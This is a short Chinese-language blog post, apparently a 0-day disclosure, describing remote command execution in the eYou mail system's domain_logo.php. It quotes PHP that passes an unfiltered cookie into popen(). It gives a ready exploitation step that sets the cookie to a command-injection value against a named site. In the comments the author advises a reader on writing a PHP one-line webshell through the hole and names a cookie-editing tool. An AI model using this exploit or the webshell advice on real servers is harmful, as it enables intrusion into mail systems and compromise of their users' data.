eYou邮件系统远程命令执行

#1 漏洞代码 /grad/admin/domain_logo.php [php] $val){ print($val); } exit; ?> [/php] [php] $domain = $_COOKIE['cookie']; //接收cookie值,无任何过滤 $fp = popen("/var/eyou/sbin/hashid ".$domain,'r'); //直接带进了危险函数popen 可远程执行任意命令 [/php] #2 漏洞利用 访问http://secmap.cn/grad/admin/domain_logo.php 修改cookie 值为:aa|| echo test>>test.txt 刷新 便可以在该目录下生成test.txt eyou

7 条评论

  1. a

    显示 Bad Request 怎么回事

  2. 路过

    版本是多少的?

    1. 0day5
      @路过

      低于最新版

  3. jxncchs

    您好,直接传php一句话木马,传不上啊,能指导下吗

    1. 0day5
      @jxncchs

      直接写一句话,如果不行,多半是没有写入权限或者是修复了

  4. 追梦

    请教用什么工具?

    1. 0day5
      @追梦

      Httplive啊,可以修改cookie的工具就好了

发表评论